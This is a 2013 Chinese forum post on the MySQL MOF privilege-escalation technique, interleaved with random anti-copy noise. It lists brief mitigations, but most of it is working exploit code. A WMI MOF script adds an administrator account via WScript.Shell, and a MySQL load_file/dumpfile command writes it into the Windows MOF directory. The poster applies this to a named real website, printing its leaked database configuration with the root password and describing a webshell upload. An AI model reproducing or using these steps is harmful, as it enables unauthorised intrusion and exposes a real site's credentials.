Mysql mof扩展漏洞防范方法
a* s" M, }3 L8 T; [) G
. s4 W, G7 M/ p网上公开的一些利用代码:
/ l6 f* e1 s/ D- X% N
) |$ _$ Y5 P7 C! ~5 C) e1 N#pragma namespace(“\\\\.\\root\\subscription”)( r6 Q# Z& _* b; c! @
, w) m' E/ H l9 v$ Einstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };9 T$ D1 G$ n! F
" t# B6 D6 G3 }/ F$ r; M& i7 K; U& e* `
3 t1 q/ M: `6 S. J( H
. }5 D) b# l5 O1 [9 ?; S9 T ; P, g8 @3 }( u% y
2 `3 ~# h! n5 _1 d1 f连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
9 A$ Y4 X9 s: U从上面代码来看得出解决办法:
6 e+ h% F4 [4 O% w' t4 V8 K* N/ Q1 `, O/ [# e0 Q* f
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数# ]: \( f9 f3 t: I* R' m8 F2 K5 D
! x& I1 \5 j( L! {2、禁止使用”WScript.Shel”组件
0 l4 `* z& z0 v# Q: w0 x0 y8 N0 c# h
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
& p! ^/ D, Q, i! h3 I7 `
0 V6 O9 ^6 n* v7 ]7 U9 p6 }当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
0 M2 k F$ j" Z6 [+ B, Z% R2 H! G' I, i9 [
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权& T. b+ f! }2 T. { g
0 E! R( D* c) |) N( W" ~但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容+ u6 J8 f( N' A) j |
% ^, h7 W# v. J: a
看懂了后就开始练手吧
% P# c) A& c* j( a* @+ @, ?( B/ Z# s
http://www.webbmw.com/config/config_ucenter.php 一句话 a' y: F u! t3 A+ t* w" _% [3 k9 S' |
5 V6 j9 A. r2 o- c) M @$ L, a$ ~
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
m) Q/ B# e2 G2 J$ p+ j( C
5 ]$ M+ N( k# A4 X于是直接用菜刀开搞+ m7 a1 r5 M5 W5 y- T- `& r
9 ~+ B) u" W' B上马先( W7 r9 G L2 H& K4 X# D' U
/ g7 M" g5 m% F! k; Q0 Z
既然有了那些账号 之类的 于是我们就执行吧…….1 a$ f( M* L: c& K' N2 i0 v b
1 {+ {9 n; [, a/ S" t% V! W
小小的说下! {, N$ @% }% z4 D5 }
2 A$ p9 k3 M4 @; K$ r在这里第1次执行未成功 原因未知& P# X" D5 \4 d
3 ~" C% T1 |6 F, U8 y3 M4 ]( o% ~我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
2 ~" J2 ]6 \+ J; f3 }$ [: ^
. J% `) p2 W) J. V7 j6 p#pragma namespace(“\\\\.\\root\\subscription”)2 h2 F2 n' M9 |; J
Y9 D% F6 o M( n% w+ @instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };; O# Z1 p$ Z& K
2 Z0 v: P) h/ C$ ]/ L
我是将文件放到C:\WINDOWS\temp\1.mof
, W2 ]0 F1 i- S) H" [1 K" e+ w3 E7 {$ b% R" R: U7 d
所以我们就改下执行的代码
. o$ x# j! B% z, K$ p% O8 n5 j- b" ]8 p6 y9 r$ U
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
+ m& C& r# W9 A' p% F
. S, K+ e0 @( `( S- d7 v4 p. b! }9 ?. z* n8 Q1 t
# O$ @# G5 C6 r3 A. A" ?5 P# ~( S( I
但是 你会发现账号还是没有躺在那里。。
0 Y4 O Q% Z7 ~) G2 a* I
' T: I9 d! n7 K: o$ s; ]/ W于是我就感觉蛋疼9 M$ O' p4 u6 X* n+ j8 ?
: B- K. X1 h( N% M1 }) C
就去一个一个去执行 但是执行到第2个 mysql时就成功了………$ I- t7 ~% Z# q0 q& X) |8 d
' S8 P4 @5 { k! p
& f" h) |, H3 u
& w9 H5 t# C2 O2 d/ h. |* w但是其他库均不成功…
% b* r! @# i8 i% ^8 D7 r5 n& y
8 F1 F( W" K! M1 j我就很费解呀 到底为什么不成功求大牛解答…0 S5 \7 F! R) @7 [; m
' L+ N3 j( C0 V" I1 i, ]
7 O' ]" l, f& B' W! B- G% m
. h8 t: E8 ~7 ?! v C |
发表于 2013-1-4 19:49:49
收藏
支持
反对